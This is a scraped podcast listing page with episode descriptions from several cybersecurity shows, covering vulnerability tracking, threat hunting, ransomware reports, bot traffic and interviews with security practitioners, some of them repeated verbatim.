POPULARITY
Categories
Forecast = Scattered phishing attempts with a 90% chance of encrypted clouds. In this episode of Storm⚡️Watch, the crew dissects the evolving vulnerability tracking landscape and the challenges facing defenders as they move beyond the aging CVE system. The show also highlights the rise of sophisticated bot traffic, the expansion of GreyNoise's Global Observation Grid, and fresh tools from VulnCheck and Censys that are helping security teams stay ahead of real-time threats. In our listener poll this week, we ask: what would you do if you found a USB stick? It's a classic scenario that always sparks debate about curiosity versus caution in cybersecurity. It's officially cyber report season, and we're breaking down the latest findings from some of the industry's most influential threat intelligence teams. GreyNoise's new research spotlights the growing risk from resurgent vulnerabilities-those old flaws that go quiet for years before suddenly making a comeback, often targeting edge devices like routers and VPNs. The FBI's 2024 IC3 report is out, revealing a record $16.6 billion in reported losses last year, with phishing, extortion, and business email compromise topping the charts. Mandiant's M-Trends 2025, VulnCheck's Q1 exploitation trends, and other reports all point to a relentless pace of vulnerability weaponization, with nearly a third of new CVEs being exploited within 24 hours of disclosure. We also dig into a series of ace blog posts and research from Censys, including their push to end stale indicators and their deep dives into the sharp rise in attacks targeting edge security devices. Their recent work with GreyNoise and CursorAI on botnet hunting, as well as their new threat hunting module, are changing the game for proactive defense. VulnCheck's quarterly report is raising eyebrows with the revelation that 159 vulnerabilities were exploited in Q1 2025 alone, and 28% of those were weaponized within a single day of disclosure. This underscores how quickly attackers are operationalizing new exploits and why defenders need to move faster than ever. We round out the show with the latest from runZero and a look at GreyNoise's recent findings, including a ninefold surge in Ivanti Connect Secure scanning and a spike in Git configuration crawling-both of which highlight the ongoing risk of codebase exposure and the need for continuous vigilance. Storm Watch Homepage >> Learn more about GreyNoise >>
Forecast = Prepare for scattered CVEs, rising bot storms, and real-time threat lightning. Keep your digital umbrellas handy! On this episode of Storm⚡️Watch, we're breaking down the latest shifts in the vulnerability tracking landscape, starting with the ongoing turbulence in the CVE program. As the MITRE-run CVE system faces funding uncertainty and a potential transition to nonprofit status, the global security community is rapidly adapting. New standards and databases are emerging to fill the gaps—Europe's ENISA is rolling out the EU Vulnerability Database to ensure regional control, while China continues to operate its own state-mandated systems. Meanwhile, the CVE ecosystem's chronic delays and the NVD's new “Deferred” status for tens of thousands of older vulnerabilities are pushing teams to look elsewhere for timely, enriched vulnerability data. Open-source projects like OSV.dev and commercial players such as VulnCheck and Snyk are stepping up, offering real-time enrichment, exploit intelligence, and predictive scoring to help organizations prioritize what matters most. The result is a fragmented but innovative patchwork of regional, decentralized, open-source, and commercial solutions, with hybrid approaches quickly becoming the norm for defenders worldwide. We're also diving into Imperva's 2024 Bad Bot Report, which reveals that nearly a third of all internet traffic last year came from malicious bots. These bots are getting more sophisticated—using residential proxies, mimicking human behavior, and bypassing traditional defenses. The report highlights a surge in account takeover attacks and shows that industries like entertainment and retail are especially hard hit, with bot traffic now outpacing human visitors in some sectors. The rise of simple bots, fueled by easy-to-use AI tools, is reshaping the threat landscape, while advanced and evasive bots continue to challenge even the best detection systems. On the threat intelligence front, GreyNoise has just launched its Global Observation Grid—now the largest deception sensor network in the world, with thousands of sensors in over 80 countries. This expansion enables real-time, verifiable intelligence on internet scanning and exploitation, helping defenders cut through the noise and focus on the threats that matter. GreyNoise's latest research shows attackers are exploiting vulnerabilities within hours of disclosure, with a significant portion of attacks targeting legacy flaws from years past. Their data-driven insights are empowering security teams to prioritize patching and response based on what's actually being exploited in the wild, not just theoretical risk. We're also spotlighting Censys and its tools for tracking botnets and advanced threats, including collaborative projects with GreyNoise and CursorAI. Their automated infrastructure mapping and pivoting capabilities are helping researchers quickly identify related malicious hosts and uncover the infrastructure behind large-scale attacks. Finally, VulnCheck continues to bridge the gap during the CVE program's uncertainty, offering autonomous enrichment, real-time exploit tracking, and comprehensive coverage—including for CVEs that NVD has deprioritized. Their Known Exploited Vulnerabilities catalog and enhanced NVD++ service are giving defenders a broader, faster view of the threat landscape, often surfacing critical exploitation activity weeks before it's reflected in official government feeds. As the vulnerability management ecosystem splinters and evolves, organizations are being forced to rethink their strategies—embracing a mix of regional, open-source, and commercial intelligence to maintain visibility and stay ahead of attackers. The days of relying on a single source of truth for vulnerability data are over, and the future is all about agility, automation, and real-time insight. Storm Watch Homepage >> Learn more about GreyNoise >>
Send us a textCyber Defense Meets Leadership Mastery!
Please enjoy this encore of Word Notes. The process of proactively searching through networks to detect and isolate security threats, rather than relying on security solutions or services to detect those threats. CyberWire Glossary link: https://thecyberwire.com/glossary/threat-hunting Audio reference link: “My ‘Aha!" Moment - Methods, Tips, & Lessons Learned in Threat Hunting - sans Thir Summit 2019.” YouTube, YouTube, 25 Feb. 2020.
This week we dive into security headlines including a botnet bonanza that includes TP-Link routers, Chinese attackers targeting Juniper and Fortinet, and a case study of nation-state actors penetrating the operator of a small US electric utility. We also discuss ransomware attacks targeting critical infrastructure, a backdoor in an Android variant used in streaming devices,... Read more »
This week we dive into security headlines including a botnet bonanza that includes TP-Link routers, Chinese attackers targeting Juniper and Fortinet, and a case study of nation-state actors penetrating the operator of a small US electric utility. We also discuss ransomware attacks targeting critical infrastructure, a backdoor in an Android variant used in streaming devices,... Read more »
Please enjoy this encore of Word Notes. The process of proactively searching through networks to detect and isolate security threats, rather than relying on security solutions or services to detect those threats. CyberWire Glossary link: https://thecyberwire.com/glossary/threat-hunting Audio reference link: “My ‘Aha!" Moment - Methods, Tips, & Lessons Learned in Threat Hunting - sans Thir Summit 2019.” YouTube, YouTube, 25 Feb. 2020. Learn more about your ad choices. Visit megaphone.fm/adchoices
In this episode of Out of the Woods: The Threat Hunting Podcast, this live discussion focuses on where threat hunters should focus their time to drive real security impact. How experienced hunters prioritize their time - What matters most in real-world threat hunting. The biggest mistakes that slow hunters down - Common distractions and how to avoid them. How to refine your investigative approach - Strategies to ensure your hunts lead to real findings. Interesting Artifacts: https://cybersources.site/ https://github.com/FalconForceTeam/FalconHound https://medium.com/falconforce/falconhound-attack-path-management-for-blue-teams-42adedc9cae5 https://github.com/SpecterOps/BloodHound?tab=readme-ov-file https://github.com/SpecterOps/BloodHound-Legacy https://www.youtube.com/watch?v=Pn7GWRXfgeI https://www.eccouncil.org/cybersecurity-exchange/cyber-talks/cloud-threat-hunting-tactics-for-enhanced-azure-security/
Forecast = Ransomware storms surge with an 87% spike in industrial attacks—brace for ICS strikes from GRAPHITE and BAUXITE! Infostealers hit healthcare and education, while VPN vulnerabilities pour in—grab your digital umbrella! It's report season and today the crew kicks things off with a breakdown of Veracode's State of Software Security 2025 Report, highlighting significant improvements in OWASP Top 10 pass rates but also noting concerning trends in high-severity flaws and security debt. Next, we take a peek at Dragos's 2025 OT/ICS Cybersecurity Report, which reveals an increase in ransomware attacks against industrial organizations and the emergence of new threat groups like GRAPHITE and BAUXITE. The report also details the evolution of malware targeting critical infrastructure, such as Fuxnet and FrostyGoop. The Huntress 2025 Cyber Threat Report is then discussed, showcasing the dominance of infostealers and malicious scripts in the threat landscape, with healthcare and education sectors being prime targets. The report also highlights the shift in ransomware tactics towards data theft and extortion. The team also quickly covers a recent and _massive_ $1.5 billion Ethereum heist. We *FINALLY* cover some recent findings from Censys, including their innovative approach to discovering non-standard port usage in Industrial Control System protocols. This segment also touches on the growing threat posed by vulnerabilities in edge security products. We also *FINALLY* get around to checking out VulnCheck's research, including an analysis of Black Basta ransomware group's tactics based on leaked chat logs, and their efforts to automate Stakeholder Specific Vulnerability Categorization (SSVC) for more effective vulnerability prioritization. The episode wraps up with mentions of GreyNoise's latest reports on mass internet exploitation and a newly discovered DDoS botnet, providing listeners with a well-rounded view of the current cybersecurity landscape. Storm Watch Homepage >> Learn more about GreyNoise >>
Forecast = Expect a storm of insights as we tackle cybersecurity's cloudy diversity gaps, edge device downpours, and ransomware winds blowing from Black Basta! In this episode of Storm⚡️Watch, we kick things off with an insightful interview with Mary N. Chaney, the CEO of Minorities in Cybersecurity (MiC). MiC is a groundbreaking organization dedicated to addressing the lack of support and representation for women and minority leaders in cybersecurity. Mary shares how MiC is building a community that fosters leadership development and equips members with essential skills for career advancement. We also discuss the alarming statistics that highlight the underrepresentation of minorities in cybersecurity leadership roles and explore how MiC's programs, like The MiC Inclusive Community™ and The MiC Leadership Series™, are making a tangible difference. Next, the crew descends into a critical discussion about edge security products, drawing on insights from Censys. These devices, while vital for network protection, are increasingly becoming prime targets for attackers. We examine recent vulnerabilities added to CISA's Known Exploited Vulnerabilities catalog, including flaws in products from Palo Alto Networks and SonicWall, and explore how state-sponsored actors like Salt Typhoon are exploiting these weaknesses. The conversation underscores the importance of proactive patch management and tools like attack surface monitoring to mitigate risks. In the next segment, we analyze leaked chat logs from the Black Basta ransomware group with insights from VulnCheck. These logs reveal how Black Basta prioritizes vulnerabilities in widely used enterprise technologies, their rapid response to new advisories, and even their pre-publication knowledge of certain CVEs. We break down their strategy for selecting targets based on financial viability, industry focus, and vulnerability presence, offering actionable advice for defenders to stay ahead. Finally, we turn our attention to GreyNoise's recent observations of active exploitation campaigns targeting Cisco vulnerabilities by Salt Typhoon, a Chinese state-sponsored group. Using data from GreyNoise's global observation grid, we discuss how legacy vulnerabilities like CVE-2018-0171 remain valuable tools for advanced threat actors. This segment highlights the importance of patching unaddressed issues and leveraging real-time threat intelligence to protect critical infrastructure. Storm Watch Homepage >> Learn more about GreyNoise >>
Welcome to the third episode of our Energy Talks miniseries titled, Why Should You Talk About Incident Response? Join OMICRON cybersecurity consultant Simon Rommer as he explores the different process steps involved in cybersecurity incident response with other experts from the power industry. In this episode, Simon speaks with Johann Stockinger, Head of Digital Forensics and Incident Response at the Deutsche Telekom Security Operations Center, about the importance of Identification in the incident response process.
Chaos and security concerns continue in Washington. Spanish authorities arrest a man suspected of hacking NATO, the UN, and the US Army. A major U.S. hiring platform exposes millions of resumes. Another British engineering firm suffers a cyberattack. Cisco patches multiple vulnerabilities. Cybercriminals exploit SVG files in phishing attacks. SparkCat SDK targets cryptocurrency via Android and iOS apps. CISA directs federal agencies to patch a high-severity Linux kernel flaw. Thailand leaves scamming syndicates in the dark. Positive trends in the fight against ransomware. Our guest is Cliff Crosland, CEO and Co-founder at Scanner.dev, discusses the evolution of security data lakes and the "bring your own" model for security tools. Don't eff with the FCC. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Today on our Industry Voices segment, guest Cliff Crosland, CEO and Co-founder at Scanner.dev, discusses the evolution of security data lakes and the "bring your own" model for security tools. For some additional details, check out their blog on “Security Data Lakes: A New Tool for Threat Hunting, Detection & Response, and GenAI-Powered Analysis.” Selected Reading Musk's DOGE agents access sensitive personnel data, alarming security officials (Washington Post) Union groups sue Treasury over giving DOGE access to sensitive data (The Record) Hacker Who Targeted NATO, US Army Arrested in Spain (SecurityWeek) Hiring platform serves users raw with 5.4 million CVs exposed (Cybernews) IMI becomes the latest British engineering firm to be hacked (TechCrunch) Cisco Patches Critical Vulnerabilities in Enterprise Security Product (SecurityWeek) Scalable Vector Graphics files pose a novel phishing threat (Sophos News) Crypto-stealing apps found in Apple App Store for the first time (Bleeping Computer) Ransomware payments dropped in 2024 as victims refused to pay hackers (TechCrunch) CISA orders agencies to patch Linux kernel bug exploited in attacks (Bleeping Computer) Thailand cuts power supply to Myanmar scam hubs (The Record) Robocallers posing as FCC fraud prevention team call FCC staff (Bleeping Computer) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
We spoke to Will Bengtson (VP of Security Operations at HashiCorp) bout the realities of cloud incident response and detection. From root credentials to event-based threats, this conversation dives deep into: Why cloud security is NOT like on-prem – and how that affects incident response How attackers exploit APIs in seconds (yes, seconds—not hours!) The secret to building a cloud detection program that actually works The biggest detection blind spots in AWS, Azure, and multi-cloud environments What most SOC teams get WRONG about cloud security Guest Socials: Will's Linkedin Podcast Twitter - @CloudSecPod If you want to watch videos of this LIVE STREAMED episode and past episodes - Check out our other Cloud Security Social Channels: - Cloud Security Podcast- Youtube - Cloud Security Newsletter - Cloud Security BootCamp If you are interested in AI Cybersecurity, you can check out our sister podcast - AI Cybersecurity Podcast Questions asked: (00:00) Introduction (00:38) A bit about Will Bengtson (05:41) Is there more awareness of Incident Response in Cloud (07:05) Native Solutions for Incident Response in Cloud (08:40) Incident Response and Threat Detection in the Cloud (11:53) Getting started with Incident Response in Cloud (20:45) Maturity in Incident Response in Cloud (24:38) When to start doing Threat Hunting? (27:44) Threat hunting and detection in MultiCloud (31:09) Will talk about his BlackHat training with Rich Mogull (39:19) Secret Detection for Detection Capability (43:13) Building a career in Cloud Detection and Response (51:27) The Fun Section
Forecast: Breach storms surge with Chinese actors, Ivanti spreads wider, and malware disguises itself—stay alert and patched! This episode of Storm⚡️Watch features exciting developments in security tooling and concerning breaches in critical infrastructure. We're thrilled to finally talk about Censeye on the pod! It's Censys's powerful new automated hunting platform that's revolutionizing how security teams conduct threat hunting. This innovative tool combines automation with Censys's comprehensive internet scanning capabilities, complete with new gadgets that enhance threat detection and analysis capabilities. In major security news, a significant breach at the US Treasury's Committee on Foreign Investment (CFIUS) has been attributed to Chinese state-sponsored actors. This concerning development potentially exposed sensitive data about national security reviews of foreign investments in American companies. The Ivanti vulnerability situation continues to evolve, with UK domain registry giant Nominet now confirming they've been impacted by the recent Ivanti VPN exploits. This development highlights the expanding blast radius of this critical security issue. 2025 has already seen sophisticated threat actors weaponizing exploits, with researchers uncovering an information stealer disguised as a proof-of-concept exploit for the LDAPNightmare vulnerability (CVE-2024-49113). We'll explore how Censys Search is strengthening phishing prevention through advanced SSL/TLS certificate monitoring, providing organizations with crucial tools to identify and prevent potential phishing campaigns. The episode concludes with an in-depth look at GreyNoise classifications, particularly focusing on suspicious activity patterns identified in the last 24 hours. We'll break down what these classifications mean for security teams and how to leverage this intelligence effectively. Storm Watch Homepage >> Learn more about GreyNoise >>
Forecast: Strong vulnerability management systems roll in, with scattered threat hunting ahead. Brace for ProjectSend exploits and turbulence near Kansas City. In this episode of Storm⚡️Watch, we explore crucial cybersecurity trends and breaking developments across the industry. Our recent community poll revealed fascinating insights into resource allocation priorities, with Vulnerability Management and Patching emerging as the clear frontrunner, chosen by half of respondents. Threat Intelligence and Hunting secured the second spot with 27.3% of votes, while Security Awareness and Incident Response capabilities tied for third place. Breaking news from Kansas City highlights a significant cybersecurity incident with a federal indictment for computer hacking, demonstrating the ongoing challenges in cybercrime enforcement. Meanwhile, the cybersecurity community continues to experience shifts in social media dynamics, particularly noting the ongoing migration of cyber professionals from X (formerly Twitter) to alternative platforms. Censys has made waves with their latest release of Censeye, an innovative automated hunting tool now available to the security community. This development arrives alongside VulnCheck's critical discovery of CVE-2024-11680, a ProjectSend vulnerability currently being exploited in the wild, emphasizing the importance of rapid threat detection and response. The GreyNoise team shares exciting news about "The Greyt Migreytion," heralding the rollout of their new global observation grid, a game-changing advancement in threat detection and response. Storm Watch Homepage >> Learn more about GreyNoise >>
In this episode, we interview Jean Francois Dive : threat hunting for Cisco internal Security. He takes us through the stakes of a few very recent and famous hacks.
Podcast: PrOTect It All (LS 24 · TOP 10% what is this?)Episode: The Future of Automation and AI in Operational Technology with Shane CoxPub date: 2024-11-25Get Podcast Transcript →powered by Listen411 - fast audio-to-text and summarizationIn Episode 33, Aaron Crow explores the transformative impact of automation and AI in the Operational Technology (OT) sector, joined by industry expert Shane Cox from Morgan Franklin Cyber. This episode deepens how AI and automation can enhance security operations when balanced with human oversight and strategic implementation. Shane Cox shares insights on Morgan Franklin's flexible and expert-driven approach to Managed Detection and Response (MDR) services, emphasizing the importance of tailored client partnerships and continuous collaboration. The discussion highlights the potential of AI to revolutionize security while addressing the unique challenges and risks of integrating automated solutions. Tune in to learn how the right blend of technology, expertise, and strategy can drive effective security solutions and foster long-term client relationships in today's evolving cybersecurity landscape. Key Moments: 05:15 Flexible, evolving security service, partnership-focused approach. 07:06 Diverse tools are essential for all organizations. 12:58 Weekend setup complete; improved over subsequent months. 15:30 MDR/XDR: Cloud-based threat detection and response. 18:21 Flexible MDR service integrates client environments efficiently. 21:38 Integration speeds up threat detection and response. 24:52 Cautious automation best balances efficiency and control. 29:50 AI assists coding by highlighting potential errors. 32:12 People are crucial for effective security automation. 35:51 Superior team preferred over superior product. 39:06 AI integration risks due to untested promises. 41:46 Adapting security training amidst AI automation challenges. Guest Profile: Shane Cox leads the Cyber Fusion Center at MorganFranklin Cyber where he is responsible for the delivery of managed services such as Orion MDR, Advanced Detection and Response (ADR), Threat Hunting, Adversary Simulation, Cyber Threat Intelligence (CTI), and Incident Response and Management. Shane has over 25 years of experience in IT and Cyber Security, leading the development and optimization of security programs within enterprise and managed services environments. He has deep experience and success providing customized, business-aligned security outcomes for a diverse range of client environments and industry verticals. How to connect with Shane: https://www.linkedin.com/feed/update/urn:li:activity:7264640034891337730 https://www.sdxcentral.com/articles/stringerai-announcements/morganfranklin-consulting-launches-orion-mdr-service-with-stellar-cyber/2024/11/ Connect With Aaron Crow: Website: www.corvosec.com LinkedIn: https://www.linkedin.com/in/aaronccrow Learn more about PrOTect IT All: Email: info@protectitall.co Website: https://protectitall.co/ X: https://twitter.com/protectitall YouTube: https://www.youtube.com/@PrOTectITAll FaceBook: https://facebook.com/protectitallpodcast To be a guest or suggest a guest/episode, please email us at info@protectitall.co Please leave us a review on Apple/Spotify Podcasts: Apple - https://podcasts.apple.com/us/podcast/protect-it-all/id1727211124 Spotify - https://open.spotify.com/show/1Vvi0euj3rE8xObK0yvYi4The podcast and artwork embedded on this page are from Aaron Crow, which is the property of its owner and not affiliated with or endorsed by Listen Notes, Inc.
Unlock the Power of Network Packet Data in CybersecurityIn this episode of the Endace Packet Forensics Files, Michael Morris dives into the critical role of network packet data in cybersecurity with Matt Bromiley, a seasoned threat-hunting expert. Matt shares why robust detection systems and proactive threat hunting are essential, and how network data serves as the “glue” that ties together evidence in cybersecurity investigations.The challenges of managing large data volumes, the growing role of AI in threat detection, and the tools needed to stay ahead of emerging threats are explored. Matt provides practical steps to seamlessly integrate packet capture into a threat-hunting toolkit, enabling teams to uncover and respond to even the most elusive threats.Matt emphasizes the importance of implementing a comprehensive packet capture strategy and using advanced tools, including AI, to manage data and enhance detection. He also stresses the need for continuous team training to effectively interpret data and respond to real-time threats, strengthening your defense against complex threats.Don't miss this insightful episode, where Matt shares expert tips on optimizing threat hunting and leveraging packet capture to strengthen your cybersecurity defenses.
Let's talk about Threat Hunting! On this episode of Security Noise, Geoff and Skyler are joined by Principal Security Consultants Shane Hartman and Justin Vaicaro to discuss the essential components of a successful Threat Hunting program. But where do you start and how do you access the best resources? Listen as they share insights on building an effective program, operationalizing practices, and the importance of a proactive mindset. About this podcast: Security Noise, a TrustedSec Podcast hosted by Geoff Walton and Producer/Contributor Skyler Tuter, features our cybersecurity experts in conversation about the security topics that interest them the most.
An excerpt from a great TechTalk we did back in June on Threat Hunting with Memory Forensics given by Monnappa who also teaches Check Point's Threat Hunting Using Memory Forensics course.
In this episode of the Microsoft Threat Intelligence Podcast host Sherrod DeGrippo is joined by the authors of the new book The Definitive Guide to KQL: Using Kusto Query Language for Operations, Defending, and Threat Hunting. Guests Rod Trent, Matt Zorich, and Mark Morowczynski discuss the significance of KQL (Kusto Query Language) in cloud data security and how it enables efficient data querying for threat detection in Microsoft products like Sentinel and Defender. They share insights from their own experiences, highlight key features of the book, and explain how both beginners and experts can benefit from KQL. Later in the episode Sherrod speaks with Senior Threat Hunter Lekshmi Vijayne about the growing trend of cyberattacks using malicious PowerShell commands. Lekshmi explains how attackers trick users into copying and pasting harmful code, often through compromised websites or phishing emails. They discuss how these attacks aim to install remote access tools like NetSupport RAT or information stealers, targeting sensitive data like browser credentials and crypto keys. In this episode you'll learn: How KQL is applied in real-world security scenarios including incident response Key features and benefits of KQL when it comes to security and cloud data Distinguishing between legitimate and malicious uses of remote management tools Some questions we ask: How does KQL tie into the Microsoft ecosystem, like Defender and Copilot? What advice would you give to someone new to KQL who wants to start learning? What is the technique we're seeing with copy-pasting malicious PowerShell? Resources: View Mark Morowczynski on LinkedIn View Matt Zorich on LinkedIn View Rod Trent on LinkedIn View Lekshmi Vijayne on LinkedIn View Sherrod DeGrippo on LinkedIn Related Microsoft Podcasts: Afternoon Cyber Tea with Ann Johnson The BlueHat Podcast Uncovering Hidden Risks Discover and follow other Microsoft podcasts at microsoft.com/podcasts Get the latest threat intelligence insights and guidance at Microsoft Security Insider The Microsoft Threat Intelligence Podcast is produced by Microsoft and distributed as part of N2K media network.
In this episode Michael, Mark and Sarah talk to Matt Zorich and Waymon Ho of the Microsoft GHOST team. We discuss the role GHOST plays in protecting both Microsoft and our customers from nation-state threat actors. We also cover the latest security news about Event Grid, NetApp Files, Chaos Studio and AKS. https://aka.ms/azsecpod
Send us a Text Message.Purav Desai is a Microsoft 365 incident responder at a large financial institution (name withheld to protect the innocent). He shares his journey and expertise in the field. He explains how his early exposure to Microsoft security solutions and their constant innovation led him to specialize in 365 security and incident response. He discusses the importance of mentors and influential figures in his career, highlighting the lessons he learned from them. He then dives into his popular project, Deciphering UAL (Unified Audit Logs), which aims to make sense of the complex logs in Microsoft 365. Purav shares an incident response scenario involving a banking Trojan and how he used telemetry and logging to investigate and remediate the issue. He concludes by discussing effective threat detection methods in Microsoft 365, including threat hunting with KQL and leveraging Zero-Hour Auto-Purge (ZAP) to prevent the spread of attacks. In our conversation, we dive into:How specializing in Microsoft 365 security and incident response can be a wise choice due to the constant innovation and market demand for Microsoft solutions.How having mentors and influential figures in your career can provide valuable guidance and inspire you to push yourself and try new things.His personal project, Deciphering UAL (Unified Audit Logs), aims to make sense of the complex logs in Microsoft 365, providing insights for digital forensics and incident response.How proper licensing and logging configuration are crucial for effective incident response.How native tools like Purview Audit and eDiscovery provide valuable insights for forensic analysis.The future of cloud security.Simplify cloud security with Prisma Cloud, the Code to Cloud platform powered by Precision AI.Disclaimer: This post contains affiliate links. If you make a purchase, I may receive a commission at no extra cost to you.
In this week's Top 5 Threat Hunting Headlines, Scott and Tom discuss top cybersecurity threats, including Kaspersky's Tusk InfoStealer campaign, a cloud extortion campaign exploiting AWS environments, APT41's advanced tactics against a Taiwanese research institute, and the Banshee InfoStealer targeting macOS. They also explore the impact of AI on cybersecurity, emphasizing the need for SOCs to evolve with new talent and strategies to address emerging threats. The episode underscores the importance of staying vigilant and adapting to the rapidly changing threat landscape. Top 5 Threat Hunting Headlines - 19 Aug 2024 1. Secure List | Tusk Campaign Uses Infostealers and Clippers for Financial Gain https://securelist.com/tusk-infostealers-campaign/113367/ 2. Unit 42 | Leaked Environment Variables Allow Large-Scale Extortion Operation of Cloud Environments https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/ 3. Cisco Talos Blog | APT41 Likely Compromised Taiwanese Government-Affiliated Research Institute with ShadowPad and Cobalt Strike https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/?&web_view=true 4. Elastic Security Labs | Beyond the Wail: Deconstructing the BANSHEE Infostealer https://www.elastic.co/security-labs/beyond-the-wail 5. Help Net Security | 74% of IT Professionals Worry That AI Tools Will Replace Them https://www.helpnetsecurity.com/2024/08/15/it-professionals-ai-worry/?web_view=true ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
Top 5 Threat Hunting Headlines - 12 Aug 2024 1. DarkReading | SaaS Apps Present an Abbreviated Kill Chain for Attackers https://www.darkreading.com/application-security/saas-apps-present-abbreviated-kill-chain-for-attackers?&web_view=true 2. ReasonLabs | Enterprise Grade Security to All of Your Personal Devices https://reasonlabs.com/research/new-widespread-extension-trojan-malware-campaign 3. DFIR | Threat Actors' Toolkit: Leveraging Silver, PoshC2 & Batch Scripts https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/ 4. SafeBreach | Downgrade Attacks Using Windows Updates https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/ 5. Cyble | Double Trouble: Latrodectus and ACR Stealer Observed Spreading Via Google Authenticator Phishing Site https://cyble.com/blog/double-trouble-latrodectus-and-acr-stealer-observed-spreading-via-google-authenticator-phishing-site/?&web_view=true ----- Follow Us! Twitter: https://twitter.com/CyborgSecInc LinkedIn: https://www.linkedin.com/company/cyborg-security/ YouTube: https://www.youtube.com/cyborgsecurity Discord: https://discord.gg/DR4mcW4zBr TikTok: https://www.tiktok.com/@cyborgsecinc
In this Brand Story episode, Sean Martin gets to chat with Vivek Ramachandran, Co-Founder and CEO of SquareX, at the Black Hat USA conference in Las Vegas. The discussion centers around SquareX's innovative approach to browser security and its relevance in today's cybersecurity landscape.Vivek explains that SquareX is developing a browser-native security product designed to detect, mitigate, and hunt threats in real-time, specifically focusing on the online activities of enterprise employees. This solution operates entirely within the browser, leveraging advanced technologies like WebAssembly to ensure minimal impact on the user experience.The conversation shifts to the upcoming DEF CON talk by Vivek, titled “Breaking Secure Web Gateways for Fun and Profit,” which highlights the seven sins of secure web gateways and SASE SSE solutions. According to Vivek, these cloud proxies often fail to detect and block web attacks due to inherent architectural limitations. He mentions SquareX's research revealing over 25 different bypasses, emphasizing the need for a new approach to tackle these vulnerabilities effectively.Sean and Vivek further discuss the practical implementation of SquareX's solution. Vivek underscores that traditional security measures often overlook browser activities, presenting a blind spot for many organizations. SquareX aims to fill this gap by providing comprehensive visibility and real-time threat detection without relying on cloud connectivity.Vivek also answers questions about the automatic nature of the browser extension deployment, ensuring it does not disrupt day-to-day operations for users or IT teams. Additionally, he touches on the importance of organizational training and awareness, helping security teams interpret new types of alerts and attacks that occur within the browser environment.Towards the end of the episode, Vivek introduces a new attack toolkit designed for organizations to test their own secure web gateways and SASE SSE solutions, empowering them to identify vulnerabilities firsthand. He encourages security leaders to use this tool and visit a dedicated website for practical demonstrations.Listeners are invited to connect with Vivek and the SquareX team, especially those attending Black Hat and DEF CON, to learn more about this innovative approach to browser security.Learn more about SquareX: https://itspm.ag/sqrx-l91Note: This story contains promotional content. Learn more.Guest: Vivek Ramachandran, Founder, SquareX [@getsquarex]On LinkedIn | https://www.linkedin.com/in/vivekramachandran/ResourcesLearn more and catch more stories from SquareX: https://www.itspmagazine.com/directory/squarexView all of our Black Hat USA 2024 coverage: https://www.itspmagazine.com/black-hat-usa-2024-hacker-summer-camp-2024-event-coverage-in-las-vegasAre you interested in telling your story?https://www.itspmagazine.com/telling-your-story
In this Brand Story episode, Sean Martin gets to chat with Vivek Ramachandran, Co-Founder and CEO of SquareX, at the Black Hat USA conference in Las Vegas. The discussion centers around SquareX's innovative approach to browser security and its relevance in today's cybersecurity landscape.Vivek explains that SquareX is developing a browser-native security product designed to detect, mitigate, and hunt threats in real-time, specifically focusing on the online activities of enterprise employees. This solution operates entirely within the browser, leveraging advanced technologies like WebAssembly to ensure minimal impact on the user experience.The conversation shifts to the upcoming DEF CON talk by Vivek, titled “Breaking Secure Web Gateways for Fun and Profit,” which highlights the seven sins of secure web gateways and SASE SSE solutions. According to Vivek, these cloud proxies often fail to detect and block web attacks due to inherent architectural limitations. He mentions SquareX's research revealing over 25 different bypasses, emphasizing the need for a new approach to tackle these vulnerabilities effectively.Sean and Vivek further discuss the practical implementation of SquareX's solution. Vivek underscores that traditional security measures often overlook browser activities, presenting a blind spot for many organizations. SquareX aims to fill this gap by providing comprehensive visibility and real-time threat detection without relying on cloud connectivity.Vivek also answers questions about the automatic nature of the browser extension deployment, ensuring it does not disrupt day-to-day operations for users or IT teams. Additionally, he touches on the importance of organizational training and awareness, helping security teams interpret new types of alerts and attacks that occur within the browser environment.Towards the end of the episode, Vivek introduces a new attack toolkit designed for organizations to test their own secure web gateways and SASE SSE solutions, empowering them to identify vulnerabilities firsthand. He encourages security leaders to use this tool and visit a dedicated website for practical demonstrations.Listeners are invited to connect with Vivek and the SquareX team, especially those attending Black Hat and DEF CON, to learn more about this innovative approach to browser security.Learn more about SquareX: https://itspm.ag/sqrx-l91Note: This story contains promotional content. Learn more.Guest: Vivek Ramachandran, Founder, SquareX [@getsquarex]On LinkedIn | https://www.linkedin.com/in/vivekramachandran/ResourcesLearn more and catch more stories from SquareX: https://www.itspmagazine.com/directory/squarexView all of our Black Hat USA 2024 coverage: https://www.itspmagazine.com/black-hat-usa-2024-hacker-summer-camp-2024-event-coverage-in-las-vegasAre you interested in telling your story?https://www.itspmagazine.com/telling-your-story
